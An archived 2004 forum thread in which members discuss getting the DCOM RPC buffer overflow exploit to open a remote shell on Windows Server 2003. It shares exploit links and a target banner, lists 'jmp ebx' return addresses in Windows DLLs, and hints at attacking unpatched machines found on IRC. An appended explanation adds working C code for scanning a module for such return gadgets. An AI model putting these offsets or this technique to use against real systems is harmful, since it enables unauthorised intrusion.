Forums: Old, But A Goodie - Forums


Old, But A Goodie DCOM

#1 EXPLOiTED

  • Sergeant
  • Group: Members
  • Posts: 236
  • Joined: 23-October 03

Posted 09 January 2004 - 12:59 PM

Hey, I just started looking into exploits and want to learn more about them and the new ones that come out rapidly. I was testing some within my home network. I started with DCOM, for which I used the compiled cygwin DLL version (/dcom <Target ID> <Target IP>). Trying it on my 2003 machine, it got in, therefore causing the RPC service to shut down/start, shut down/start, and the same with the PC. I was expecting a remote shell to spawn. Did I do something wrong?

#2 vnet576

  • Specialist
  • Group: Members
  • Posts: 1,000
  • Joined: 01-August 03

Posted 09 January 2004 - 01:02 PM

You need to find an offset for Win2k3. The default DCOM exploit only has universal offsets for 2k and XP.

#3 EXPLOiTED

  • Sergeant
  • Group: Members
  • Posts: 236
  • Joined: 23-October 03

Posted 09 January 2004 - 02:19 PM

Oh, I see. Yeah, I saw something about offsets. Is there a file to figure it out? Isn't it one of the DLLs in the OS?

#4 icenix

  • Private First Class
  • Group: Members
  • Posts: 91
  • Joined: 05-January 04

Posted 10 January 2004 - 04:40 AM

New ones?
Don't worry, dude. DCOM and RPC exploits are so common.
The easiest way is to get yourself an IRC client and log onto dal.net.
It's like a breeding ground for script kiddies and unpatched M$ boxes.
Perfect for testing... not that I'm encouraging it.

I've got you a couple of links that you might be interested in:

http://www.k-otik.co.../07.30.dcom48.c
an exploit (very messy)

http://www.ntisys.co...M-exploits.html
this is a good link if you're wanting to find the most common Windows exploits (DCOM / RPC)

http://www.securitea...5WP0B20B5C.html
a better exploit

http://www.securitea...6Q0042K8KA.html
another exploit

My suggestion, if you're looking for exploits, is to check out securiteam.com.
It's full of useful information.
It's my 1st stop...

ch33rs
icenix

#5 r3L4x

  • Corporal
  • Group: Members
  • Posts: 168
  • Joined: 13-August 03

Posted 10 January 2004 - 08:50 PM

Hmm, I can never get those things to work.

#6 Flowby

  • Sergeant
  • Group: Members
  • Posts: 205
  • Joined: 06-September 03

Posted 11 January 2004 - 09:48 AM

Hi Relax!!! LOL ;)
What problem do you have?

#7 JaX

  • Private
  • Group: Members
  • Posts: 10
  • Joined: 11-January 04

Posted 11 January 2004 - 09:53 AM

;) There is a DCOM with a universal offset out there.

#8 pita

  • Corporal
  • Group: Members
  • Posts: 153
  • Joined: 15-September 03

Posted 27 January 2004 - 06:58 AM

Maybe take a look at this nice article:
http://www.nextgenss...-protection.pdf

#9 Dinos (Guest)

  • Group: Guests

Posted 27 January 2004 - 11:15 AM

I did that some time ago and it's quite nice and working. If somebody is interested, just tell me where to upload the file.

$new/win3
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM <hdm [at] metasploit.com>
- Rewritten adding generic hosts - Dinos
- Usage: new/win3 <Target ID> <Target IP>
- Targets:
- 0 Windows 2000 SP0 (english)
- 1 Windows 2000 SP1 (english)
- 2 Windows 2000 SP2 (english)
- 3 Windows 2000 SP3 (english)
- 4 Windows 2000 SP4 (english)
- 5 Windows XP SP0 (english)
- 6 Windows XP SP1 (english)
- 7 Windows 2000 (Generic)
- 8 Windows XP (Generic)

Regards,
Dinos

#10 pita

  • Corporal
  • Group: Members
  • Posts: 153
  • Joined: 15-September 03

Posted 27 January 2004 - 11:49 AM

I think that you don't understand: he wants to exploit his Windows 2003 server, so your "magical" ret for 2k and XP will simply not work for 2k3...

Although, if you look at the Metasploit exploit for DCOM
( http://www.metasploi...m/releases.html )

they say that they use jmp ebx, so I think at first view that you have to search for a jmp ebx.

Values for 2003 server (US) are:

-=[ ntdll.dll ]=-
jmp ebx 0x77fb5d83

-=[ kernel32.dll ]=-
jmp ebx 0x77ece3ca
jmp ebx 0x77eda8e3

-=[ msvcrt.dll ]=-
jmp ebx 0x77ba8ef8
jmp ebx 0x77ba96d5
jmp ebx 0x77bb31b1

So maybe you will need to use one of them in place of your ret and that will spawn the shell, but I don't have 2k3 so I can't help you more than this :)
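Posts #2 and #10 both come down to the same task: the exploit's hard-coded return address is only valid for the Windows 2000 / XP builds it was written against, and for Server 2003 you have to locate your own "jmp ebx" (or an equivalent sequence that transfers control to EBX) inside a system DLL at that target's load address. The block below is an added example, not code from this thread, from the Metasploit DCOM module or from the tools that produced pita's address list. It scans a flat image of a module for the byte encodings of jmp ebx (FF E3), call ebx (FF D3) and push ebx; ret (53 C3), turns each match into a virtual address, and drops any address that contains a byte the attack string cannot carry (here 0x00, the usual string-copy constraint; the actual forbidden bytes depend on the particular overflow). The module image, its base address 0x77fb5d00 and the bad-byte list are all constructed for the demonstration; on a real target you would dump the DLL from the running process, or parse the PE section table so that file offsets are mapped to RVAs, and use the module's real load base, which is why every service pack and language build in Dinos's target list needs its own value.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* One candidate return address: the virtual address at which an
   instruction sequence that passes control to EBX begins. */
typedef struct {
    uint32_t    va;    /* image base + offset of the sequence */
    const char *name;  /* which sequence matched */
} hit_t;

typedef struct {
    const char          *name;
    const unsigned char *bytes;
    size_t               len;
} gadget_t;

/* IA-32 encodings of the sequences an exploit can return into. */
static const unsigned char G_JMP_EBX[]      = { 0xFF, 0xE3 }; /* jmp ebx        */
static const unsigned char G_CALL_EBX[]     = { 0xFF, 0xD3 }; /* call ebx       */
static const unsigned char G_PUSH_EBX_RET[] = { 0x53, 0xC3 }; /* push ebx ; ret */

static const gadget_t GADGETS[] = {
    { "jmp ebx",       G_JMP_EBX,      sizeof G_JMP_EBX      },
    { "call ebx",      G_CALL_EBX,     sizeof G_CALL_EBX     },
    { "push ebx; ret", G_PUSH_EBX_RET, sizeof G_PUSH_EBX_RET },
};

/* Returns 1 if any of the four little-endian bytes of va appears in bad[].
   Such an address would be cut short or altered while the attack string
   is copied, so it is unusable even though the gadget is really there. */
int va_has_bad_byte(uint32_t va, const unsigned char *bad, size_t nbad)
{
    for (size_t i = 0; i < 4; i++) {
        unsigned char b = (unsigned char)(va >> (8 * i));
        for (size_t j = 0; j < nbad; j++)
            if (b == bad[j]) return 1;
    }
    return 0;
}

/* Scan a flat in-memory image of a module (laid out as at runtime, so
   offset == RVA) for every gadget in GADGETS. Matches whose address
   contains a byte from bad[] are discarded. Hits are written in ascending
   address order; returns the number written (at most max). */
size_t find_ebx_gadgets(const unsigned char *image, size_t len, uint32_t base,
                        const unsigned char *bad, size_t nbad,
                        hit_t *out, size_t max)
{
    size_t n = 0;
    for (size_t off = 0; off < len && n < max; off++) {
        for (size_t g = 0; g < sizeof GADGETS / sizeof GADGETS[0]; g++) {
            const gadget_t *gd = &GADGETS[g];
            if (off + gd->len > len) continue;
            if (memcmp(image + off, gd->bytes, gd->len) != 0) continue;
            uint32_t va = base + (uint32_t)off;
            if (!va_has_bad_byte(va, bad, nbad)) {
                out[n].va   = va;
                out[n].name = gd->name;
                n++;
            }
            break; /* at most one gadget starts at a given offset */
        }
    }
    return n;
}

/* Constructed sample "module": a few instruction bytes standing in for a
   real ntdll.dll, with a constructed base chosen so that the first match
   lands on an address containing a 0x00 byte and gets filtered out. */
static const uint32_t      SAMPLE_BASE    = 0x77fb5d00u;
static const unsigned char SAMPLE_IMAGE[] = {
    0xFF, 0xE3,   /* +0x00 jmp ebx        -> 0x77fb5d00, contains 0x00, dropped */
    0x90, 0x90,   /* +0x02 nop ; nop */
    0xFF, 0xD3,   /* +0x04 call ebx       -> 0x77fb5d04 */
    0x8B, 0xFF,   /* +0x06 mov edi,edi */
    0x53, 0xC3,   /* +0x08 push ebx ; ret -> 0x77fb5d08 */
    0xC3,         /* +0x0a ret */
    0xFF, 0xE3,   /* +0x0b jmp ebx        -> 0x77fb5d0b */
    0xCC, 0xCC,   /* +0x0d int3 padding */
};

int main(void)
{
    static const unsigned char bad[] = { 0x00 }; /* constructed constraint */
    hit_t  hits[16];
    size_t n = find_ebx_gadgets(SAMPLE_IMAGE, sizeof SAMPLE_IMAGE, SAMPLE_BASE,
                                bad, sizeof bad, hits, 16);
    for (size_t i = 0; i < n; i++)
        printf("%-14s 0x%08x\n", hits[i].name, hits[i].va);
    return 0;
}
```

The scan is byte-aligned on purpose: x86 instructions can start at any byte, so a usable jmp ebx may sit in the middle of what the disassembler shows as a longer instruction, and a search that only walks instruction boundaries would miss it. When a list like pita's is built against a real DLL, the remaining question is still the one from post #1: the address must belong to the exact binary the target runs, otherwise the return lands in the wrong place and the RPC service crashes and restarts instead of spawning the shell.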
